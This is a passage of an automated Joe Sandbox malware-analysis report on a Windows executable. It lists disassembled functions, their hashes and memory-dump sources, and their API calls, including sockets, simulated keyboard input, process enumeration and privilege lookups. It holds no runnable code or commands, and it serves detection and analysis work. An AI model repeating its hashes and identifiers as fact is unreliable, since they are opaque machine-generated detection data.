Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: e6a605b5520db47fcee25b880cf1d40c7d85d78e6da8e1c1b5e64e2e4dfc1e4c
Instruction ID: 5f5e3fae79927ed006117f5ff4b5f48b41f373a8692586551b08cde933ffe858
Opcode Fuzzy Hash: e6a605b5520db47fcee25b880cf1d40c7d85d78e6da8e1c1b5e64e2e4dfc1e4c
Instruction Fuzzy Hash: D5A16D756043119FC700EF24D985A2EB7E5FF89714F048899F98A9B3A2DB34EE01CB91

Function 00B00436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B005F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B00608
CLSIDFromProgID.OLE32(?,?,00000000,00B3CC40,000000FF,?,00000000,00000800,00000000,?,00B3FC08,?), ref: 00B0062D
_memcmp.LIBVCRUNTIME ref: 00B0064E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
Instruction ID: 888a84b7355de5a58fd8cbaaa89bc4b9bf365f4c9948778ae298656a71923c6d
Opcode Fuzzy Hash: d176e47009348dcbbb2243b8e8c2a4cee34fdaaf30de3e348bb2dd8f14e85689
Instruction Fuzzy Hash: B781EE75A10109EFCB04DF94C984EEEBBF9FF89315F204598E516AB290DB71AE05CB60

Function 00AE1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00AE14C0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7396a0d2efb3b7ac5a69a67ba40c5c6585b898cd31d093870f8179087b4e0ae1
Instruction ID: 56d23e42f2474cee3c0db800be2c7658a5719a0ddae2eb282c1341b7eba3b5f6
Opcode Fuzzy Hash: 7396a0d2efb3b7ac5a69a67ba40c5c6585b898cd31d093870f8179087b4e0ae1
Instruction Fuzzy Hash: DF415CB1A00561ABDB216BBA8D45BBE3AF5EF41330F15422AF41AD73D2E63488419361

Function 00B36278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(015CE8A0,?), ref: 00B362E2
ScreenToClient.USER32(?,?), ref: 00B36315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00B36382

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
Instruction ID: c2df02068af4e2a5099a4dfd91394345eedcf07d2e2543535ba2db1f031dd985
Opcode Fuzzy Hash: 51f874f72453d59638f77eeca9508354d002695b8aedd4a0430847dffa99af07
Instruction Fuzzy Hash: 74512A75A00209EFCB14DF68D881AAE7BF5EB45360F208599F9559B2A0DB30ED81CB50

Function 00B21AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B21AFD
WSAGetLastError.WSOCK32 ref: 00B21B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B21B8A
WSAGetLastError.WSOCK32 ref: 00B21B94

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
Instruction ID: 8c4f5287ddb4afc14f1f9eeaa351cc07f93d9ac0275d2fcd181901b98733a144
Opcode Fuzzy Hash: 3f6fdbfe69efc8a4fe28cc982e5bbf441d20e4e6c97e6b7273ca58b1703d4bcd
Instruction Fuzzy Hash: D841D234600210AFE720AF24D98AF6A77E5EB45718F548488F91A9F3D3D772DD418B90

Function 00ADB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
Instruction ID: 96c7ad1245768278f5f3992e1a7f0ee2fb1dad707bfb7c237176bc95996b5a78
Opcode Fuzzy Hash: 4390cb0066a7d4c61633dc47aca3ccad195d028f5b5e2e7064a866d23a41a0c5
Instruction Fuzzy Hash: 2F41E2B6A10354EFD724DF38C941BAABBB9EB88710F11852FF152DB382D771990187A0

Function 00B156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B15783
GetLastError.KERNEL32(?,00000000), ref: 00B157A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B157CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B157FA

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
Instruction ID: fe77daf749fdbb8867f7f80e58f33e92aff4074c4ac4bb44324a0ee6a824aa77
Opcode Fuzzy Hash: 783ccad5cc1cdf13e153297da33934e1cb815d46b4e1223d5bae4ca28d75eda3
Instruction Fuzzy Hash: D141EE35600611DFCB11EF55C585A5EBBE2EF89720F19C498E84A6B3A2CB34FD41CB91

Function 00ADD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00AC6D71,00000000,00000000,00AC82D9,?,00AC82D9,?,00000001,00AC6D71,8BE85006,00000001,00AC82D9,00AC82D9), ref: 00ADD910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00ADD999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00ADD9AB
__freea.LIBCMT ref: 00ADD9B4

Part of subcall function 00AD3820: RtlAllocateHeap.NTDLL(00000000,?,00B71444,?,00ABFDF5,?,?,00AAA976,00000010,00B71440,00AA13FC,?,00AA13C6,?,00AA1129), ref: 00AD3852

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 4fc04d4d690ba4f005263ac7a4818ccec89edc60ff70c375f2475029bbc68fb1
Instruction ID: faa9288d3a046d32e1e076f526d11507a5a8a63ae150b1ce3e678e5d4a91076c
Opcode Fuzzy Hash: 4fc04d4d690ba4f005263ac7a4818ccec89edc60ff70c375f2475029bbc68fb1
Instruction Fuzzy Hash: 4531E172A0020AABDF24CF64DC95EAE7BA5EB40310F154169FC05E7250EB36DD50CB90

Function 00B352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00B35352
GetWindowLongW.USER32(?,000000F0), ref: 00B35375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B35382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00B353A8

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
Instruction ID: dd108bd414795780087aac621d27d72de63830fd7087d61baa52b60ac2869eff
Opcode Fuzzy Hash: 373a5ae92b169e32b899c45a6eda6febc0a603a7f2d4f84a57bd211b605a8560
Instruction Fuzzy Hash: 8931C434A95A0CEFEB309E58CC46BE837E5EB05390F784181FA12971E1C7B0AD80DB59

Function 00B0AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00B0ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 00B0AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 00B0AC74
SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00B0ACC6

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
Instruction ID: 64ac2889beab969415f735c4b64a96dda914ea365095ebf7c5e0b1885f80a664
Opcode Fuzzy Hash: c50a435c95d856e2e8f3a4c99140113a5d524e1da18e9b42fc92dd63484d4304
Instruction Fuzzy Hash: 32311030A04718AFFB358B648C09BFE7FE5EB89310F098A9AE485971D1C77499858792

Function 00B37674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00B3769A
GetWindowRect.USER32(?,?), ref: 00B37710
PtInRect.USER32(?,?,00B38B89), ref: 00B37720
MessageBeep.USER32(00000000), ref: 00B3778C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
Instruction ID: 9ac490be080256f301f80a06e31f0efef747527f69b52700d32dfe56ed80073c
Opcode Fuzzy Hash: f3188964a0088247dd81af40cbc37b765dd78529f29c76bda4652c560394253d
Instruction Fuzzy Hash: 54418DB4645214EFCB22CF98C895EA97BF5FB49314F2580E8E5259B261CB30AD42CF90

Function 00B316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00B316EB

Part of subcall function 00B03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B03A57
Part of subcall function 00B03A3D: GetCurrentThreadId.KERNEL32 ref: 00B03A5E
Part of subcall function 00B03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00B025B3), ref: 00B03A65

GetCaretPos.USER32(?), ref: 00B316FF
ClientToScreen.USER32(00000000,?), ref: 00B3174C
GetForegroundWindow.USER32 ref: 00B31752

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
Instruction ID: 98f974ee727f01e78d9e029da844a5181cabb3049ffce972984ee31b9a80cdba
Opcode Fuzzy Hash: d724b5c15fec78197a2b96aa6709d22042bb743244e1babaa2ebf259b4c4b27b
Instruction Fuzzy Hash: 583152B1E00249AFD700DFA9C981CAEBBFDEF49304B5484A9E415E7251DB31DE45CBA0

Function 00B0D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00B0D501
Process32FirstW.KERNEL32(00000000,?), ref: 00B0D50F
Process32NextW.KERNEL32(00000000,?), ref: 00B0D52F
CloseHandle.KERNEL32(00000000), ref: 00B0D5DC

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: e0f14d182bcd4115f558da728dbeb0faf62c495a9caf501aa6ad051c9c9e726f
Instruction ID: 636d744b02d5cb695c617621f13ac8f3dabcfc57b40f3bf62d4227d4338576fa
Opcode Fuzzy Hash: e0f14d182bcd4115f558da728dbeb0faf62c495a9caf501aa6ad051c9c9e726f
Instruction Fuzzy Hash: A6317E711082009FD300EF94CC85AAFBFE8EF9A354F14092DF585971E1EB719949CB92

Function 00B38FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2

GetCursorPos.USER32(?), ref: 00B39001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00AF7711,?,?,?,?,?), ref: 00B39016
GetCursorPos.USER32(?), ref: 00B3905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00AF7711,?,?,?), ref: 00B39094

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
Instruction ID: 30f3fd55d453ba21602eee8b0fab125aceca51ecb8bc47fbca83a23463f9be8b
Opcode Fuzzy Hash: 8eea1ce6ff6c8293f671c39970e79a19918cdc9942e5e5b287763dc7701babef
Instruction Fuzzy Hash: 6D21D135600118EFCB298F98CC59EFE3BF9EF49350F204095F90557261C771A991DB60

Function 00B0D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00B3CB68), ref: 00B0D2FB
GetLastError.KERNEL32 ref: 00B0D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00B3CB68), ref: 00B0D376

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
Instruction ID: b2639fcfec32c40d0e3f1db4ecce7958aa4733caf5777c4bc49d90864acd1c04
Opcode Fuzzy Hash: e986e7c15e15857c8474f85394886d7d57c219ecb9eebfe40d60870325eaf6ea
Instruction Fuzzy Hash: 02217C705083019FC700DFA8C98186FBBE4EE5A364F204A5DF499D72E1EB309946CB97

Function 00B01571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B0102A
Part of subcall function 00B01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B01036
Part of subcall function 00B01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01045
Part of subcall function 00B01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B0104C
Part of subcall function 00B01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B01062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B015BE
_memcmp.LIBVCRUNTIME ref: 00B015E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B01617
HeapFree.KERNEL32(00000000), ref: 00B0161E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
Instruction ID: b75a6ad55ec4e235686297672c59d4982c25b8f974f288ebe6e896741e4b989b
Opcode Fuzzy Hash: 2c6ef1454f484f511427d1e39e4c10ba549b679479a9016f44f14e5047971896
Instruction Fuzzy Hash: 2F217C31E00108AFDB18DFA8CD45BEEBBF8EF44344F184899E441AB291E731AA45DB50

Function 00B32782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00B3280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00B32832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00B32840

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
Instruction ID: f5734f314edb935942cac831cb84c4a5456a5fc26c72f893df81400cf4a5cf36
Opcode Fuzzy Hash: c07a73ea5be4b61c6c7bcff31879a12fca9665dbb89b3ff4e95b38ef8ae4c1b7
Instruction Fuzzy Hash: F721B331605511AFD7149B24C855FAA7B95FF46324F258198F4268B6E2CB71FC42C790

Function 00B078F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B08D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08D8C
Part of subcall function 00B08D7D: lstrcpyW.KERNEL32(00000000,?,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B08DB2
Part of subcall function 00B08D7D: lstrcmpiW.KERNEL32(00000000,?,00B0790A,?,000000FF,?,00B08754,00000000,?,0000001C,?,?), ref: 00B08DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07923
lstrcpyW.KERNEL32(00000000,?,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00B08754,00000000,?,0000001C,?,?,00000000), ref: 00B07984

Strings

cdecl, xrefs: 00B0797B

Memory Dump Source

